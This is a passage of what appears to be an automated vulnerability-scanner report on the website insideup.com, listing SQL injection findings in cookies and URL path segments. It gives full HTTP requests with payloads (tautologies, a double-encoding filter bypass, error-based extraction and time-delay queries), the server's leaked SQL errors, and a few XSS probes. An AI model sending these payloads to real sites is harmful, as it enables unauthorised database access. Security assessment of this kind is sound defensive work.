OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:35:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n98iduo0ibqqns3thlon062gq4; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00/project_dynamic_page_updated.php was not found on this server.</p>

1.311. http://www.insideup.com/ppc/leadflow/hins00/project.php [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the JSESSIONID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069'; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7230
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.312. http://www.insideup.com/ppc/leadflow/hins00/project.php [OAID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The OAID cookie appears to be vulnerable to SQL injection attacks. The payload 59503172'%20or%201%3d1--%20 was submitted in the OAID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee59503172'%20or%201%3d1--%20; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7230
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.313. http://www.insideup.com/ppc/leadflow/hins00/project.php [OAVARS[a08b960a] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The OAVARS[a08b960a] cookie appears to be vulnerable to SQL injection attacks. The payload 17315712'%20or%201%3d1--%20 was submitted in the OAVARS[a08b960a] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D17315712'%20or%201%3d1--%20; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7230
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.314. http://www.insideup.com/ppc/leadflow/hins00/project.php [OAVARS[a750dce4] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The OAVARS[a750dce4] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a750dce4] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D'
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7230
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.315. http://www.insideup.com/ppc/leadflow/hins00/project.php [PHPSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the PHPSESSID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783%2527; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j3ih87sif6judm1aru5v4f9ha7; path=/
Content-Length: 7230
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.316. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j23oasevfq3jc4cljp2d0nv165; path=/
Content-Length: 4094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow''/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jlvolfqgp3g1na6sd6min3s2o1; path=/
Content-Length: 3917
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.317. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6rc7aqfvqu347ckivrtbsh1j31; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc=iupsc&address=';WAITFOR DELAY '0:0:25'--&attributeId_342_g=20' at line 5

1.318. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /ppc/leadflow/hins00%2527/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i9l2mh22h1nbb5vf9aihuo1su7; path=/
Content-Length: 7334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.319. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00'/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
